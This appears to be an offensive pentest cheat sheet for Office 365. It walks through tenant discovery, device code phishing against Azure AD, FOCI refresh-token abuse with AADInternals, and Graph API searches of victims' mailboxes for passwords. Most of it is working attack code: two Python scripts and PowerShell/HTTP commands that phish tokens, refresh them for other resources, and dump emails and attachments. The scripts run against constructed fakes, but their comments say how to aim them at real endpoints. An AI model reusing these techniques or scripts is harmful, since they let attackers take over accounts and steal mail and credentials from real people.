Microsoft Office 365 (O365)

These are part of O365:

Find Tenant ID

The tenant ID is needed to automate the later steps (e.g. in Python). Enter the target domain at https://www.whatismytenantid.com/, or ask Azure AD directly: https://login.microsoftonline.com/{domain}/v2.0/.well-known/openid-configuration returns the tenant's OpenID configuration, and the tenant GUID is embedded in its issuer field.

With the tenant ID, the same OpenID configuration document lists the tenant's endpoints (authorization, token, device authorization, JWKS) and supported features:

https://login.microsoftonline.com/{tenant_id}/v2.0/.well-known/openid-configuration

Device code phishing

The attacker requests a device code from the legitimate Azure AD endpoint, sends the victim the resulting user code together with Microsoft's own sign-in URL (https://microsoft.com/devicelogin), and polls the token endpoint. When the victim enters the code and signs in, Azure AD issues the access token and refresh token to whoever is polling, i.e. the attacker. No attacker-controlled page is involved: the login page, domain and TLS certificate are all Microsoft's, which is what makes the lure convincing. A device code can be requested through the following endpoint (the code is valid for 15 minutes; the poller redeems it at https://login.microsoftonline.com/common/oauth2/token with grant_type=urn:ietf:params:oauth:grant-type:device_code):

https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0

The access token obtained is a JWT bound to a single resource (its aud claim) and set of scopes (scp). The refresh token is the valuable part: it can be redeemed for access tokens to other resources, and on behalf of other Microsoft first-party client IDs in the same "family of client IDs" (FOCI), without the victim seeing another prompt. Choose a client ID that is allowed to call the Graph API and request a new access token for https://graph.microsoft.com:
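The whole chain above (tenant discovery, device code request, polling, inspecting the token, redeeming the refresh token for another resource) as an added Python example; this is not code from the original page or from AADInternals. HTTP is injected as a `post` callable that returns parsed JSON, so the block runs offline against a constructed fake of login.microsoftonline.com; for real use pass something like `lambda url, data: requests.post(url, data=data).json()`. The FakeAzureAD class, its scripted responses, the token contents and the GUID are all constructed for the demo.

```python
"""Device code phishing against the Azure AD v1 endpoints (added example, runs offline)."""
import base64
import json
import re
import time

LOGIN = "https://login.microsoftonline.com"
DEVICECODE_URL = f"{LOGIN}/common/oauth2/devicecode?api-version=1.0"
TOKEN_URL = f"{LOGIN}/common/oauth2/token"
GRAPH = "https://graph.microsoft.com"
OFFICE_CLIENT_ID = "d3590ed6-52b3-4102-aeff-aad2292ab01c"  # "Microsoft Office" first-party client
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def tenant_id_from_openid_config(doc: dict) -> str:
    """The issuer in .../{domain}/v2.0/.well-known/openid-configuration embeds the tenant GUID."""
    m = GUID_RE.search(doc["issuer"])
    if not m:
        raise ValueError("issuer carries no tenant GUID: " + doc["issuer"])
    return m.group(0)


def request_device_code(post, client_id=OFFICE_CLIENT_ID, resource=GRAPH) -> dict:
    """Step 1: ask Azure AD for a device code; user_code + verification_url go to the victim."""
    r = post(DEVICECODE_URL, data={"client_id": client_id, "resource": resource})
    return {"user_code": r["user_code"], "device_code": r["device_code"],
            "verification_url": r["verification_url"],
            "interval": int(r["interval"]), "expires_in": int(r["expires_in"])}  # v1 returns strings


def poll_for_token(post, dc: dict, client_id=OFFICE_CLIENT_ID,
                   sleep=time.sleep, clock=time.monotonic) -> dict:
    """Step 2: poll the token endpoint until the victim completes sign-in or the code expires."""
    body = {"grant_type": "urn:ietf:params:oauth:grant-type:device_code",
            "client_id": client_id, "code": dc["device_code"]}
    interval, deadline = dc["interval"], clock() + dc["expires_in"]
    while clock() < deadline:
        r = post(TOKEN_URL, data=body)
        if "access_token" in r:
            return r  # access_token, refresh_token, resource, expires_in, ...
        err = r.get("error")
        if err == "slow_down":
            interval += 5  # RFC 8628: back off when told to
        elif err != "authorization_pending":
            raise RuntimeError(f"device code flow ended: {err}")  # expired_token, declined, ...
        sleep(interval)
    raise TimeoutError("device code expired before the victim signed in")


def refresh_for_resource(post, refresh_token, resource, client_id=OFFICE_CLIENT_ID,
                         tenant_id="common") -> dict:
    """Step 3: redeem the refresh token for an access token to another resource."""
    return post(f"{LOGIN}/{tenant_id}/oauth2/token",
                data={"grant_type": "refresh_token", "client_id": client_id,
                      "refresh_token": refresh_token, "resource": resource})


def jwt_claims(token: str) -> dict:
    """Decode the JWT payload (no signature check) to see aud/scp/upn of what we were issued."""
    payload = token.split(".")[1]
    return json.loads(base64.urlsafe_b64decode(payload + "=" * (-len(payload) % 4)))


# ---- constructed fake of login.microsoftonline.com so the flow can be exercised offline ----
def _b64url(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def _fake_jwt(claims: dict) -> str:
    """Constructed three-part token; the signature is junk, only the payload is parsed."""
    return ".".join([_b64url(b'{"alg":"RS256","typ":"JWT"}'),
                     _b64url(json.dumps(claims).encode()), _b64url(b"not-a-signature")])


class FakeAzureAD:
    def __init__(self, token_responses):
        self.token_responses, self.posts, self.sleeps, self.now = list(token_responses), [], [], 0.0

    def post(self, url, data):
        self.posts.append((url, dict(data)))
        if url == DEVICECODE_URL:
            return {"user_code": "HXK7Q2BR", "device_code": "dc-constructed",
                    "verification_url": "https://microsoft.com/devicelogin",
                    "interval": "5", "expires_in": "900"}
        return self.token_responses.pop(0)

    def sleep(self, secs):  # advances the fake clock instead of blocking
        self.sleeps.append(secs)
        self.now += secs

    def clock(self):
        return self.now


def run_demo():
    """Scripted run: pending, slow_down, pending, then tokens; later a refresh for EWS."""
    graph_token = _fake_jwt({"aud": GRAPH, "scp": "Mail.Read User.Read", "upn": "alice@contoso.example"})
    az = FakeAzureAD([{"error": "authorization_pending"}, {"error": "slow_down"},
                      {"error": "authorization_pending"},
                      {"access_token": graph_token, "refresh_token": "0.rt-constructed", "resource": GRAPH},
                      {"access_token": _fake_jwt({"aud": "https://outlook.office365.com"}),
                       "refresh_token": "0.rt-constructed-2"}])
    tenant = tenant_id_from_openid_config({"issuer": f"{LOGIN}/11111111-2222-3333-4444-555555555555/v2.0"})
    dc = request_device_code(az.post)
    # lure text for the victim: "go to {verification_url} and enter {user_code}" (valid expires_in seconds)
    tok = poll_for_token(az.post, dc, sleep=az.sleep, clock=az.clock)
    ews = refresh_for_resource(az.post, tok["refresh_token"], "https://outlook.office365.com", tenant_id=tenant)
    return {"tenant": tenant, "user_code": dc["user_code"], "claims": jwt_claims(tok["access_token"]),
            "sleeps": az.sleeps, "refresh_url": az.posts[-1][0], "refresh_form": az.posts[-1][1],
            "ews_aud": jwt_claims(ews["access_token"])["aud"]}


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

The poller honours `slow_down` by adding five seconds to the interval and stops on any terminal error; the v1 endpoints return `interval` and `expires_in` as strings, hence the `int()` casts. `jwt_claims` deliberately skips signature verification: the token was issued to us, the point is only to read which audience and scopes it carries before deciding which resource to refresh for.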

Open a PowerShell console:

Import-Module AADInternals
# -ClientId: the first-party client the new token is issued for (see the table below)
# -Resource: the API the new token should be valid for
# -TenantId: the tenant ID found above
# -RefreshToken: the refresh token returned by the device code flow
$t = Get-AADIntAccessTokenWithRefreshToken -ClientId "d3590ed6-52b3-4102-aeff-aad2292ab01c" -Resource "https://graph.microsoft.com" -TenantId "<tenant_id>" -RefreshToken "<token>" -SaveToCache 1 -IncludeRefreshToken 1
Write-Output $t

-ClientId is the application (client) ID the new token is issued for. Microsoft's first-party clients use the well-known IDs in the table below and do not show up in the tenant's own app registrations; those can be listed through Graph (requires a directory read permission):

GET /v1.0/applications HTTP/2
Host: graph.microsoft.com
Authorization: Bearer <token>
Microsoft 365 client application   Client ID
Teams desktop, mobile              1fec8e78-bce4-4aaf-ab1b-5451cc387264
Teams web                          5e3ce6c0-2b1f-4285-8d4b-75ee78787346
Microsoft 365 web                  4765445b-32c6-49b0-83e6-1d93765276ca
Microsoft 365 desktop              0ec893e0-5785-4de6-99da-4ed124e5296c
Microsoft 365 mobile               d3590ed6-52b3-4102-aeff-aad2292ab01c
Outlook desktop                    d3590ed6-52b3-4102-aeff-aad2292ab01c
Outlook web                        bc59ab01-8403-45c6-8796-ac3ef710b3e3
Outlook mobile                     27922004-5251-4030-b22d-91ecd9a37ea4

Applications exposed by default within every Azure AD tenant

The new Graph token can then be used against the Graph API, e.g. to confirm whose identity it carries:

GET /v1.0/me HTTP/2
Host: graph.microsoft.com
Authorization: Bearer <new token>

Read emails remotely, here with a KQL search for messages whose body mentions a password (the search string must be double-quoted; results are paged, so follow @odata.nextLink):

GET /v1.0/me/messages?$search="body:password" HTTP/2
Host: graph.microsoft.com
Authorization: Bearer <new token>

See also MsGraphFunzy (GitHub, Charles Hamilton), which dumps emails through the Microsoft Graph API. The output is an HTML report with all extracted information, including the email attachments:

python3 graph_dump.py azure.token body:password
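The mailbox search and attachment pull described above, as an added Python example; this is not the page's own code and not MsGraphFunzy. The HTTP GET is injected as a callable returning parsed JSON so the block runs offline against a constructed stand-in for graph.microsoft.com; for real use pass something like `lambda url, headers, params: requests.get(url, headers=headers, params=params).json()`. The FakeGraph responses, message contents and the credential regex are constructed for the demo.

```python
"""Search a mailbox through Microsoft Graph, follow paging, pull attachments (added example)."""
import base64
import re

GRAPH = "https://graph.microsoft.com/v1.0"
SELECT = "id,subject,from,receivedDateTime,hasAttachments,bodyPreview"
# Constructed heuristic for flagging credential-looking text in bodyPreview
SECRET_RE = re.compile(r"(?i)\b(password|passwd|pwd)\b\s*[:=]\s*(\S+)")


def search_messages(get, token, query, page_size=50):
    """Run $search over the signed-in user's mailbox and follow every result page."""
    headers = {"Authorization": f"Bearer {token}"}
    url = f"{GRAPH}/me/messages"
    # Graph wants the KQL query double-quoted; $orderby cannot be combined with $search.
    params = {"$search": f'"{query}"', "$select": SELECT, "$top": page_size}
    hits = []
    while url:
        page = get(url, headers=headers, params=params)
        hits.extend(page.get("value", []))
        url = page.get("@odata.nextLink")  # absolute URL that already carries the query string
        params = None                      # so it must be requested without re-adding params
    return hits


def fetch_attachments(get, token, message_id):
    """Return (name, bytes) for each fileAttachment; Graph ships the content base64 in contentBytes."""
    headers = {"Authorization": f"Bearer {token}"}
    page = get(f"{GRAPH}/me/messages/{message_id}/attachments", headers=headers, params=None)
    out = []
    for a in page.get("value", []):
        if a.get("@odata.type") == "#microsoft.graph.fileAttachment":  # itemAttachments have no bytes
            out.append((a["name"], base64.b64decode(a["contentBytes"])))
    return out


def dump_mailbox(get, token, query="body:password"):
    """Search, pull attachments for hits that have them, and flag credential-looking lines."""
    report = []
    for m in search_messages(get, token, query):
        entry = {"subject": m.get("subject"),
                 "from": m.get("from", {}).get("emailAddress", {}).get("address"),
                 "secrets": [f"{k}={v}" for k, v in SECRET_RE.findall(m.get("bodyPreview", ""))],
                 "attachments": []}
        if m.get("hasAttachments"):
            entry["attachments"] = [(n, len(b)) for n, b in fetch_attachments(get, token, m["id"])]
        report.append(entry)
    return report


class FakeGraph:
    """Constructed responses standing in for graph.microsoft.com; records every request made."""
    NEXT = f"{GRAPH}/me/messages?$search=%22body%3Apassword%22&$skip=1"

    def __init__(self):
        self.calls = []
        self.pages = {
            f"{GRAPH}/me/messages": {
                "value": [{"id": "m1", "subject": "VPN creds", "hasAttachments": True,
                           "from": {"emailAddress": {"address": "it@contoso.example"}},
                           "bodyPreview": "Your VPN password: Winter2024!"}],
                "@odata.nextLink": self.NEXT},
            self.NEXT: {
                "value": [{"id": "m2", "subject": "Re: onboarding", "hasAttachments": False,
                           "from": {"emailAddress": {"address": "hr@contoso.example"}},
                           "bodyPreview": "The password policy is in the handbook."}]},
            f"{GRAPH}/me/messages/m1/attachments": {
                "value": [{"@odata.type": "#microsoft.graph.fileAttachment", "name": "vpn.txt",
                           "contentBytes": base64.b64encode(b"host=vpn.contoso.example").decode()},
                          {"@odata.type": "#microsoft.graph.itemAttachment", "name": "forwarded"}]},
        }

    def get(self, url, headers, params):
        self.calls.append((url, headers, params))
        return self.pages[url]


def run_demo():
    fake = FakeGraph()
    return dump_mailbox(fake.get, "<new token>"), fake.calls


if __name__ == "__main__":
    for entry in run_demo()[0]:
        print(entry)
```

The two things that bite in practice are both handled here: the second and later pages come from @odata.nextLink and must be fetched without re-sending the original query parameters, and only fileAttachment objects carry contentBytes (itemAttachment and referenceAttachment need separate handling).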